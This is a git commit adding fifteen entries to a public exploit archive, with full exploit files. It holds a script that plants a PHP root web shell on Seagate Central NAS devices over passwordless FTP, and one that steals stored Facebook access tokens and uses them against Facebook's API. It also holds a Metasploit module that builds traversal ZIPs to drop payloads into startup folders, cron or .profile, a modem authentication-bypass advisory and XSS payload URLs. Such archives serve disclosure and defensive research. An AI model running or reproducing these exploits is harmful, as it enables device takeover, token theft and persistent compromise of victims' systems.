DB: 2015-06-05
15 new exploits
This commit is contained in:
parent
0e74581282
commit
d811002c6b
16 changed files with 962 additions and 0 deletions
15
files.csv
15
files.csv
|
@ -33536,6 +33536,7 @@ id,file,description,date,author,platform,type,port
|
||||||
37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0
|
37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0
|
||||||
37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0
|
37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0
|
||||||
37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22
|
37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22
|
||||||
|
37197,platforms/windows/local/37197.py,"Jildi FTP Client 1.5.6 (SEH) BOF",2015-06-04,"Zahid Adeel",windows,local,0
|
||||||
37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
|
37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
|
||||||
37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,metasploit,hardware,remote,0
|
37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,metasploit,hardware,remote,0
|
||||||
37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
|
37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
|
||||||
|
@ -33562,6 +33563,20 @@ id,file,description,date,author,platform,type,port
|
||||||
37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 'main_page.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
|
37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 'main_page.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
|
37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0
|
||||||
|
37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0
|
||||||
37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0
|
37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0
|
||||||
37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
|
37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
|
||||||
37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21
|
37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21
|
||||||
|
37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow Vulnerability",2015-06-03,Vulnerability-Lab,windows,dos,0
|
||||||
|
37189,platforms/php/webapps/37189.txt,"Media Library Categories Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
|
37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
|
37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_layer.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
|
37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_marker.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
|
37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 'tpl_section' Parameter Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
|
37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 'admin.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
|
37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for WordPress fs-admin/fs-admin.php Multiple Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
|
37196,platforms/php/webapps/37196.txt,"Pretty Link Lite WordPress Plugin 1.5.2 SQL Injection and Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
|
37198,platforms/multiple/webapps/37198.rb,"JDownloader 2 Beta Directory Traversal Vulnerability",2015-06-04,PizzaHatHacker,multiple,webapps,0
|
||||||
|
37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0
|
||||||
|
37200,platforms/php/webapps/37200.txt,"WordPress zM Ajax Login & Register Plugin 1.0.9 Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80
|
||||||
|
|
Can't render this file because it is too large.
|
39
platforms/hardware/dos/37199.txt
Executable file
39
platforms/hardware/dos/37199.txt
Executable file
|
@ -0,0 +1,39 @@
|
||||||
|
# Exploit Title: ZTE AC 3633R USB Modem Multiple Vulnerabilities
|
||||||
|
# Date: 4/06/2015
|
||||||
|
# Exploit Author: [Vishnu (@dH3wK)
|
||||||
|
# Vendor Homepage: [http://zte.com.cn
|
||||||
|
# Version: 3633R
|
||||||
|
# Tested on: Windows, Linux
|
||||||
|
|
||||||
|
|
||||||
|
Greetings from vishnu (@dH4wk)
|
||||||
|
|
||||||
|
1. Vulnerable Product Version
|
||||||
|
|
||||||
|
- ZTE AC3633R (MTS Ultra Wifi Modem)
|
||||||
|
|
||||||
|
2. Vulnerability Information
|
||||||
|
|
||||||
|
(A) Authentication Bypass
|
||||||
|
Impact: Attacker gains administrative access
|
||||||
|
Remotely Exploitable: UNKNOWN
|
||||||
|
Locally Exploitable: YES
|
||||||
|
|
||||||
|
(B) Device crash which results in reboot
|
||||||
|
Impact: Denial of service, The crash may lead to RCE locally thus
|
||||||
|
attaining root privilege on the device
|
||||||
|
Remotely Exploitable: UNKNOWN
|
||||||
|
Locally Exploitable: YES
|
||||||
|
|
||||||
|
3. Vulnerability Description
|
||||||
|
|
||||||
|
(A) The administrative authentication mechanism of the modem can be
|
||||||
|
bypassed by feeding with a string of 121 characters in length, either in
|
||||||
|
username or password field.
|
||||||
|
|
||||||
|
(B) A crash causes the modem to restart. This is caused when either of
|
||||||
|
the password or username fields are fed with an input of 130 characters
|
||||||
|
or above.
|
||||||
|
|
||||||
|
[Note: If username is targeted for exploitation, then password field shall
|
||||||
|
be fed with minimum 6 characters (any characters) and vice versa ]
|
71
platforms/hardware/remote/37184.py
Executable file
71
platforms/hardware/remote/37184.py
Executable file
|
@ -0,0 +1,71 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
# seagate_ftp_remote_root.py
|
||||||
|
#
|
||||||
|
# Seagate Central Remote Root Exploit
|
||||||
|
#
|
||||||
|
# Jeremy Brown [jbrown3264/gmail]
|
||||||
|
# May 2015
|
||||||
|
#
|
||||||
|
# -Synopsis-
|
||||||
|
#
|
||||||
|
# Seagate Central by default has a passwordless root account (and no option to change it).
|
||||||
|
# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
|
||||||
|
# From there, we can execute commands with root privileges as lighttpd is also running as root.
|
||||||
|
#
|
||||||
|
# -Fixes-
|
||||||
|
#
|
||||||
|
# Seagate scheduled it's updates to go live on April 28th, 2015.
|
||||||
|
#
|
||||||
|
# Tested Firmware Version: 2014.0410.0026-F
|
||||||
|
#
|
||||||
|
|
||||||
|
import sys
|
||||||
|
from ftplib import FTP
|
||||||
|
|
||||||
|
port = 21
|
||||||
|
|
||||||
|
php_shell = """
|
||||||
|
<?php
|
||||||
|
if(isset($_REQUEST['cmd']))
|
||||||
|
{
|
||||||
|
$cmd = ($_REQUEST["cmd"]);
|
||||||
|
echo "<pre>$cmd</pre>";
|
||||||
|
system($cmd);
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
"""
|
||||||
|
|
||||||
|
php_shell_filename = "shell.php"
|
||||||
|
seagate_central_webroot = "/cirrus/"
|
||||||
|
|
||||||
|
def main():
|
||||||
|
if(len(sys.argv) < 2):
|
||||||
|
print("Usage: %s <host>" % sys.argv[0])
|
||||||
|
return
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(php_shell_filename, 'w') as file:
|
||||||
|
file.write(php_shell)
|
||||||
|
|
||||||
|
except Exception as error:
|
||||||
|
print("Error: %s" % error);
|
||||||
|
return
|
||||||
|
|
||||||
|
try:
|
||||||
|
ftp = FTP(host)
|
||||||
|
ftp.login("root")
|
||||||
|
ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
|
||||||
|
ftp.close()
|
||||||
|
|
||||||
|
except Exception as error:
|
||||||
|
print("Error: %s" % error);
|
||||||
|
return
|
||||||
|
|
||||||
|
print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
116
platforms/hardware/webapps/37185.py
Executable file
116
platforms/hardware/webapps/37185.py
Executable file
|
@ -0,0 +1,116 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
# seagate_central_facebook.py
|
||||||
|
#
|
||||||
|
# Seagate Central Remote Facebook Access Token Exploit
|
||||||
|
#
|
||||||
|
# Jeremy Brown [jbrown3264/gmail]
|
||||||
|
# May 2015
|
||||||
|
#
|
||||||
|
# -Synopsis-
|
||||||
|
#
|
||||||
|
# Seagate Central stores linked Facebook account access tokens in /etc/archive_accounts.ser
|
||||||
|
# and this exploit takes advantage of two bugs:
|
||||||
|
#
|
||||||
|
# 1) Passwordless root login via FTP to retrieve archive_accounts.ser file which contains access tokens
|
||||||
|
# 2) Reuses the unencrypted and unprotected (-rw-r--r--) access tokens for a chosen scope to return data
|
||||||
|
#
|
||||||
|
# -Example-
|
||||||
|
#
|
||||||
|
# > seagate_fb_accounts.py getaccesstoken 1.2.3.4
|
||||||
|
#
|
||||||
|
# 'archive_accounts.ser'
|
||||||
|
#
|
||||||
|
# a:1:{s:8:"facebook";a:1:{s:29:"user3535@facebook.com";a:5:{s:7:"service";s:8:"facebook";s:4:
|
||||||
|
# "user";s:29:"user3535@facebook.com";s:5:"owner";s:4:"test";s:6:"folder";s:7:"private";s:5:"t
|
||||||
|
# oken";s:186:"CAAxxxxxxxx..."
|
||||||
|
# ;}}}
|
||||||
|
#
|
||||||
|
# Next, try this:
|
||||||
|
#
|
||||||
|
# > seagate_fb_accounts.py CAAxxxxxxxx... friends
|
||||||
|
# server response:
|
||||||
|
#
|
||||||
|
# {'data': [{'name': 'Jessie Taylor', 'id': '100000937485968'}, {'name': 'Kellie Youty', 'id': '1
|
||||||
|
# 00000359801427'}, {'name': 'Hope Maynard', 'id': '10000102938470'}, {'name': 'Angel Tucker Pole', 'id'
|
||||||
|
# : '100001402808867'}, {'name': 'Malcolm Vance', 'id': '10000284629187'}, {'name': 'Tucker Civile', 'id':
|
||||||
|
# .....
|
||||||
|
#
|
||||||
|
# Scopes Reference: https://developers.facebook.com/docs/graph-api/reference/v2.1/user
|
||||||
|
#
|
||||||
|
# -Fixes-
|
||||||
|
#
|
||||||
|
# Seagate scheduled updates to go live on April 28th, 2015.
|
||||||
|
#
|
||||||
|
# Tested version: 2014.0410.0026-F
|
||||||
|
#
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import json
|
||||||
|
from urllib import request # python3
|
||||||
|
from ftplib import FTP
|
||||||
|
|
||||||
|
fb_url = "https://graph.facebook.com"
|
||||||
|
fb_filename = "archive_accounts.ser"
|
||||||
|
|
||||||
|
def getaccesstoken(host):
|
||||||
|
try:
|
||||||
|
ftp = FTP(host)
|
||||||
|
ftp.login("root")
|
||||||
|
ftp.retrbinary("RETR " + "/etc/" + fb_filename, open(fb_filename, 'wb').write)
|
||||||
|
ftp.close()
|
||||||
|
|
||||||
|
except Exception as error:
|
||||||
|
print("Error: %s" % error)
|
||||||
|
return
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(fb_filename, 'r') as file:
|
||||||
|
data = file.read()
|
||||||
|
|
||||||
|
except Exception as error:
|
||||||
|
print("Error: %s" % error)
|
||||||
|
return
|
||||||
|
|
||||||
|
print("\n'%s'\n\n%s\n\n" % (fb_filename, data))
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
|
def main():
|
||||||
|
if(len(sys.argv) < 2):
|
||||||
|
print("Usage: %s <key> <scope> OR getaccesstoken <host>\n" % sys.argv[0])
|
||||||
|
print("scopes: albums feed friends likes picture posts television")
|
||||||
|
return
|
||||||
|
|
||||||
|
if(sys.argv[1] == "getaccesstoken"):
|
||||||
|
if(len(sys.argv) == 3):
|
||||||
|
host = sys.argv[2]
|
||||||
|
|
||||||
|
res = getaccesstoken(host)
|
||||||
|
|
||||||
|
else:
|
||||||
|
print("Error: need host to retrieve access token file\n")
|
||||||
|
return
|
||||||
|
|
||||||
|
else:
|
||||||
|
key = sys.argv[1]
|
||||||
|
|
||||||
|
if(len(sys.argv) == 3):
|
||||||
|
scope = sys.argv[2]
|
||||||
|
else:
|
||||||
|
scope = ""
|
||||||
|
|
||||||
|
try:
|
||||||
|
response = request.urlopen(fb_url + "/me/" + scope + "?access_token=" + key).read()
|
||||||
|
|
||||||
|
except Exception as error:
|
||||||
|
print("Error: %s" % error)
|
||||||
|
return
|
||||||
|
|
||||||
|
data = json.loads(response.decode('utf-8'))
|
||||||
|
|
||||||
|
print("server response:\n\n%s\n" % data)
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
263
platforms/multiple/webapps/37198.rb
Executable file
263
platforms/multiple/webapps/37198.rb
Executable file
|
@ -0,0 +1,263 @@
|
||||||
|
=begin
|
||||||
|
# Exploit Title: JDownloader 2 Beta Directory Traversal Vulnerability (Zip Extraction)
|
||||||
|
# Date: 2015-06-02
|
||||||
|
# Exploit Author: PizzaHatHacker
|
||||||
|
# Vendor Homepage: http://jdownloader.org/home/index
|
||||||
|
# Software Link: http://jdownloader.org/download/offline
|
||||||
|
# Version: 1171 <= SVN Revision <= 2331
|
||||||
|
# Contact: PizzaHatHacker[a]gmail[.]com
|
||||||
|
# Tested on: Windows XP SP3 / Windows 7 SP1
|
||||||
|
# CVE:
|
||||||
|
# Category: remote
|
||||||
|
|
||||||
|
1. Product Description
|
||||||
|
Extract from the official website :
|
||||||
|
"JDownloader is a free, open-source download management tool with a huge community of developers that makes downloading as easy and fast as it should be. Users can start, stop or pause downloads, set bandwith limitations, auto-extract archives and much more. It's an easy-to-extend framework that can save hours of your valuable time every day!"
|
||||||
|
|
||||||
|
2. Vulnerability Description & Technical Details
|
||||||
|
JDownloader 2 Beta is vulnerable to a directory traversal security issue.
|
||||||
|
|
||||||
|
Class : org.appwork.utils.os.CrossSystem
|
||||||
|
Method : public static String alleviatePathParts(String pathPart)
|
||||||
|
|
||||||
|
This method is called with a user-provided path part as parameter,
|
||||||
|
and should return a valid and safe path where to create a file/folder.
|
||||||
|
|
||||||
|
This method first checks that the input filepath does not limit
|
||||||
|
itself to a (potentially dangerous) sequence of dots and otherwise
|
||||||
|
removes it :
|
||||||
|
pathPart = pathPart.replaceFirst("\\.+$", "");
|
||||||
|
|
||||||
|
However right after this, the value returned is cleaned from
|
||||||
|
starting and ending white space characters :
|
||||||
|
return pathPart.trim();
|
||||||
|
|
||||||
|
Therefore, if you pass to this method a list of dots followed by some white space
|
||||||
|
like ".. ", it will bypass the first check and then return the valid path ".."
|
||||||
|
which is insecure.
|
||||||
|
|
||||||
|
This leads to a vulnerability when JDownloader 2 Beta just downloaded a ZIP file and
|
||||||
|
then tries to extract it. A ZIP file with an entry containing ".. " sequence(s)
|
||||||
|
would cause JD2b to overwrite/create arbitrary files on the target filesystem.
|
||||||
|
|
||||||
|
3. Impact Analysis :
|
||||||
|
To exploit this issue, the victim is required to launch a standard ZIP file download.
|
||||||
|
The Unzip plugin is enabled by default in JDownloader : any ZIP file downloaded will
|
||||||
|
automatically be extracted.
|
||||||
|
|
||||||
|
By exploiting this issue, a malicious user may be able to create/overwrite arbitrary
|
||||||
|
files on the target file system.
|
||||||
|
Therefore, it is possible to take the control of the victim's machine with the rights of
|
||||||
|
the JDownloader process - typically standard (non-administrator) rights - for example by
|
||||||
|
overwriting existing executable files, by uploading an executable file in a user's
|
||||||
|
autorun directory etc.
|
||||||
|
|
||||||
|
4. Common Vulnerability Scoring System
|
||||||
|
* Exploitability Metrics
|
||||||
|
- Access Vector (AV) : Network (AV:N)
|
||||||
|
- Access Complexity (AC) : Medium (AC:M)
|
||||||
|
- Authentication (Au) : None (Au:N)
|
||||||
|
|
||||||
|
* Impact Metrics
|
||||||
|
- Confidentiality Impact (C) : Partial (C:P)
|
||||||
|
- Integrity Impact (I) : Partial (I:P)
|
||||||
|
- Availability Impact (A) : Partial (A:P)
|
||||||
|
|
||||||
|
* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
|
||||||
|
- CVSS Base Score : 6.8
|
||||||
|
- Impact Subscore 6.4
|
||||||
|
- Exploitability Subscore 8.6
|
||||||
|
|
||||||
|
5. Proof of Concept
|
||||||
|
- Create a ZIP file with an entry like ".. /poc.txt"
|
||||||
|
- Upload it to an HTTP server (for example)
|
||||||
|
- Run a vulnerable revision of JDownloader 2 Beta and use it to download the file from the server
|
||||||
|
- JD2b will download and extract the file, which will create a "poc.txt" one level upper from your download directory
|
||||||
|
|
||||||
|
OR see the Metasploit Exploit provided.
|
||||||
|
|
||||||
|
6. Vulnerability Timeline
|
||||||
|
2012-04-27 : Vulnerability created (SVN Revision > 1170)
|
||||||
|
2014-08-19 : Vulnerability identified
|
||||||
|
[...] : Sorry, I was not sure how to handle this and forgot about it for a long time
|
||||||
|
2015-05-08 : Vendor informed about this issue
|
||||||
|
2015-05-08 : Vendor response + Code modification (Revision 2332)
|
||||||
|
2015-05-11 : Code modification (SVN Revision 2333)
|
||||||
|
2015-05-11 : Notified the vendor : The vulnerable code is still exploitable via ".. .." (dot dot blank dot dot)
|
||||||
|
2015-05-12 : Code modification (SVN Revision 2335)
|
||||||
|
2015-05-12 : Confirmed to the vendor that the code looks now safe
|
||||||
|
2015-06-01 : JDownloader 2 Beta Update : Looks not vulnerable anymore
|
||||||
|
2015-06-04 : Disclosure of this document
|
||||||
|
|
||||||
|
7. Solution
|
||||||
|
Update JDownloader 2 Beta to the latest version.
|
||||||
|
|
||||||
|
8. Personal Notes
|
||||||
|
|
||||||
|
I am NOT a security professional, just a kiddy fan of security.
|
||||||
|
I was boring so I looked for some security flaws in some software and happily found this.
|
||||||
|
If you have any questions/remarks, don't hesitate to contact me by email.
|
||||||
|
I'm interesting in any discussion/advice/exchange/question/criticism about security/exploits/programming :-)
|
||||||
|
=end
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'rex'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::FILEFORMAT
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
include Msf::Exploit::WbemExec
|
||||||
|
|
||||||
|
def initialize( info = {} )
|
||||||
|
|
||||||
|
super( update_info( info,
|
||||||
|
'Name' => 'JDownloader 2 Beta Directory Traversal Vulnerability',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a directory traversal flaw in JDownloader 2 Beta
|
||||||
|
when extracting a ZIP file (which by default is automatically done by JDL).
|
||||||
|
|
||||||
|
The following targets are available :
|
||||||
|
Windows regular user : Create executable file in the 'Start Menu\Startup'
|
||||||
|
under the user profile directory. (Executed at next session startup).
|
||||||
|
Linux regular user : Create an executable file and a .profile script calling
|
||||||
|
it in the user's home directory. (Executed at next session login).
|
||||||
|
Windows Administrator : Create an executable file in C:\\Windows\\System32
|
||||||
|
and a .mof file calling it. (Executed instantly).
|
||||||
|
Linux Administrator : Create an executable file in /etc/crontab.hourly/.
|
||||||
|
(Executed within the next hour).
|
||||||
|
|
||||||
|
Vulnerability date : Apr 27 2012 (SVN Revision > 1170)
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [ 'PizzaHatHacker <PizzaHatHacker[A]gmail[.]com>' ], # Vulnerability Discovery & Metasploit module
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'URL', 'http://jdownloader.org/download/offline' ],
|
||||||
|
],
|
||||||
|
'Platform' => %w{ linux osx solaris win },
|
||||||
|
'Payload' => {
|
||||||
|
'Space' => 20480, # Arbitrary big number
|
||||||
|
'BadChars' => '',
|
||||||
|
'DisableNops' => true
|
||||||
|
},
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'Windows Regular User (Start Menu Startup)',
|
||||||
|
{
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Depth' => 0, # Go up to root (C:\Users\Joe\Downloads\..\..\..\ -> C:\)
|
||||||
|
'RelativePath' => 'Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/',
|
||||||
|
'Option' => nil,
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Linux Regular User (.profile)',
|
||||||
|
{
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Depth' => -2, # Go up 2 levels (/home/joe/Downloads/XXX/xxx.zip -> /home/joe/)
|
||||||
|
'RelativePath' => '',
|
||||||
|
'Option' => 'profile',
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Windows Administrator User (Wbem Exec)',
|
||||||
|
{
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Depth' => 0, # Go up to root (n levels)
|
||||||
|
'RelativePath' => 'Windows/System32/',
|
||||||
|
'Option' => 'mof',
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Linux Administrator User (crontab)',
|
||||||
|
{
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Depth' => 0, # Go up to root (n levels)
|
||||||
|
'RelativePath' => 'etc/cron.hourly/',
|
||||||
|
'Option' => nil,
|
||||||
|
}
|
||||||
|
],
|
||||||
|
],
|
||||||
|
'DefaultTarget' => nil,
|
||||||
|
'DisclosureDate' => ''
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('FILENAME', [ true, 'The output file name.', '']),
|
||||||
|
|
||||||
|
# C:\Users\Bob\Downloads\XXX\xxx.zip => 4
|
||||||
|
# /home/Bob/Downloads/XXX/xxx.zip => 4
|
||||||
|
OptInt.new('DEPTH', [true, 'JDownloader download directory depth. (0 = filesystem root, 1 = one subfolder under root etc.)', 4]),
|
||||||
|
], self.class)
|
||||||
|
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptString.new('INCLUDEDIR', [ false, 'Path to an optional directory to include into the archive.', '']),
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Traversal path
|
||||||
|
def traversal(depth)
|
||||||
|
result = '.. /'
|
||||||
|
if depth < 0
|
||||||
|
# Go up n levels
|
||||||
|
result = result * -depth
|
||||||
|
else
|
||||||
|
# Go up until n-th level
|
||||||
|
result = result * (datastore['DEPTH'] - depth)
|
||||||
|
end
|
||||||
|
return result
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
# Create a new archive
|
||||||
|
zip = Rex::Zip::Archive.new
|
||||||
|
|
||||||
|
# Optionally include an initial directory
|
||||||
|
dir = datastore['INCLUDEDIR']
|
||||||
|
if not dir.nil? and not dir.empty?
|
||||||
|
print_status("Filling archive recursively from path #{dir}")
|
||||||
|
zip.add_r(dir)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Create the payload executable file path
|
||||||
|
exe_name = rand_text_alpha(rand(6) + 1) + (target['Platform'] == 'win' ? '.exe' : '')
|
||||||
|
exe_file = traversal(target['Depth']) + target['RelativePath'] + exe_name
|
||||||
|
|
||||||
|
# Generate the payload executable file content
|
||||||
|
exe_content = generate_payload_exe()
|
||||||
|
|
||||||
|
# Add the payload executable file into the archive
|
||||||
|
zip_add_file(zip, exe_file, exe_content)
|
||||||
|
|
||||||
|
# Check all available targets
|
||||||
|
case target['Option']
|
||||||
|
when 'mof'
|
||||||
|
# Create MOF file data
|
||||||
|
mof_name = rand_text_alpha(rand(6) + 1) + '.mof'
|
||||||
|
mof_file = traversal(0) + 'Windows\\System32\\Wbem\\Mof\\' + mof_name
|
||||||
|
mof_content = generate_mof(mof_name, exe_name)
|
||||||
|
zip_add_file(zip, mof_file, mof_content)
|
||||||
|
when 'profile'
|
||||||
|
# Create .profile file
|
||||||
|
bashrc_name = '.profile'
|
||||||
|
bashrc_file = traversal(target['Depth']) + bashrc_name
|
||||||
|
bashrc_content = "chmod a+x ./#{exe_name}\n./#{exe_name}"
|
||||||
|
zip_add_file(zip, bashrc_file, bashrc_content)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Write the final ZIP archive to a file
|
||||||
|
zip_data = zip.pack
|
||||||
|
file_create(zip_data)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Add a file to the target zip and output a notification
|
||||||
|
def zip_add_file(zip, filename, content)
|
||||||
|
print_status("Adding '#{filename}' (#{content.length} bytes)");
|
||||||
|
zip.add_file(filename, content, nil, nil, nil)
|
||||||
|
end
|
||||||
|
end
|
11
platforms/php/webapps/37189.txt
Executable file
11
platforms/php/webapps/37189.txt
Executable file
|
@ -0,0 +1,11 @@
|
||||||
|
source: http://www.securityfocus.com/bid/53524/info
|
||||||
|
|
||||||
|
Media Library Categories plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||||
|
|
||||||
|
Media Library Categories 1.1.1 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=media-library-categories/add.php&bulk=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E&attachments=1
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/upload.php?page=media-library-categories/view.php&q='><script>alert(1)</script>
|
11
platforms/php/webapps/37190.txt
Executable file
11
platforms/php/webapps/37190.txt
Executable file
|
@ -0,0 +1,11 @@
|
||||||
|
source: http://www.securityfocus.com/bid/53525/info
|
||||||
|
|
||||||
|
LeagueManager plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||||
|
|
||||||
|
LeagueManager 3.7 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=leaguemanager&subpage=show-league&league_id=1&group="><script>alert(1)</script>
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=leaguemanager&subpage=team&edit=1&season=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
|
9
platforms/php/webapps/37191.txt
Executable file
9
platforms/php/webapps/37191.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/53526/info
|
||||||
|
|
||||||
|
The Leaflet plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
